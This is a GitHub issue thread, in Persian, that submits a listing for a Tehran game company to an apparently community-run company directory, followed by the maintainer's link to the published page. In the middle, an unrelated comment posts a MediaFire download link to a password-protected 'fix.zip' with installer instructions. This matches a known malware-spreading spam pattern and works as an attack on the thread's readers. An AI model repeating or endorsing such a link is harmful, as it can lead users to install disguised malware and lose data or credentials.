### ISSUE TITLE
آیریا نادین ورنا

### ISSUE THREAD

**Issue by mmovsia3** [tajrobe/tajrobe.github.io#466]
##### نام شرکت
title: "آیریا نادین ورنا"

##### نام انگلیسی شرکت
name_en: "deneb games"

##### دسته‌ی فعالیت شرکت
industry: "game"

##### موقعیت مکانی شرکت
city: "tehran"

##### تعداد نفرات شرکت
size: "30"

##### آدرس سایت شرکت
site: ""

##### توضیحی درباره شرکت و فعالیت‌هایش
content: ""

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tajrobe** [comment]
[tajrobe.github.io/آیریا-نادین-ورنا/](https://tajrobe.github.io/%D8%A2%DB%8C%D8%B1%DB%8C%D8%A7-%D9%86%D8%A7%D8%AF%DB%8C%D9%86-%D9%88%D8%B1%D9%86%D8%A7/)
